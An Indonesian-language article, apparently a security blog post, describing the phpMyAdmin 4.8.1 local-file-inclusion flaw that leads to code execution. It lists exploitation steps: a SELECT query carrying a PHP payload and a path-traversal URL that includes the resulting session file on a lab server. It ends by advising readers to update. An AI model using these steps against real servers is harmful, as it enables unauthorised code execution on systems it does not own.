phpMyAdmin sebagai salah satu software yang paling banyak digunakan untuk melakukan administrasi database memiliki kerentanan LFI dan berujung pada kerentanan RCE karena dapat mengeksekusi script php. Versi phpMyAdmin yang rentan terhadap serangan ini adalah phpMyAdmin versi 4.8.1
Untuk melakukan exploitasi ini penyerang harus terlebih dahulu login kedalam aplikasi phpMyAdmin.
Untuk mengetahui versi phpMyAdmin yang anda gunakan bisa dengan mengunjungi url /doc/html ( http://192.168.181.136:88/phpmyadmin/doc/html/ )
Berikut detail untuk melakukan exploitasinya
1. Login dengan ke phpMyAdmin
2. lakukan query --- select '<?php phpinfo();exit;?>'>/p>
3. Lakukan exploitasi LFI dengan memanfaatkan file session yang tercipta otomatis
apabila windows path nya ada di C:\Windows\Temp apabila linux ada di /var/lib/php5/
( http://192.168.181.136:88/phpmyadmin/index.php?target=db_sql.php%253f/../../../../windows/temp/sess_dfdsteve5lbtvdg5mmhv24fdn80nic1e )
Kerentanan ini sangat berbahaya karena penyerang dapat mengeksekusi php script pada server.
Pastikan versi phpMyAdmin anda telah diupdate ke versi terbaru.
Terimakasih telah membaca artikel ini.